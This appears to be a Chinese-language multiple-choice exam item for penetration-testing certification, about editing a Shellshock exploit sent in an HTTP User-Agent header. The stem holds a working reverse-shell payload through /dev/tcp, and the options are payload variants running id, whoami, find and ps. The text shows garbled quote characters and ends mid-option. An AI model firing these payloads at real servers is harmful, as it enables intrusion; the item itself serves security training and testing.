滲透測試人員在 10.10.1.1 發現了一個易受攻擊的網絡服務器。然後,測試人員編輯了一個 Python 腳本,發送網絡漏洞利用程序,並遇到以下代碼: exploit = {`User-Agent`: `() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1`, `Accept`: `text/html,application/ xhtml+xml,application/xml`} 測試人員應該對腳本進行以下哪項編輯,以確定運行服務器的用戶上下文?
A. xploit = {ג€User-Agentג€: ג€() { ignored;};/bin/bash -i id;whoamiג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}
B. xploit = {ג€User-Agentג€: ג€() { ignored;};/bin/bash -i>& find / -perm -4000ג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}
C. xploit = {ג€User-Agentג€: ג€() { ignored;};/bin/sh -i ps -efג€ 0>&1ג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€}
D. xploit = {ג€User-Agentג€: ג€() { ignored;};/bin/bash -i>& /dev/tcp/10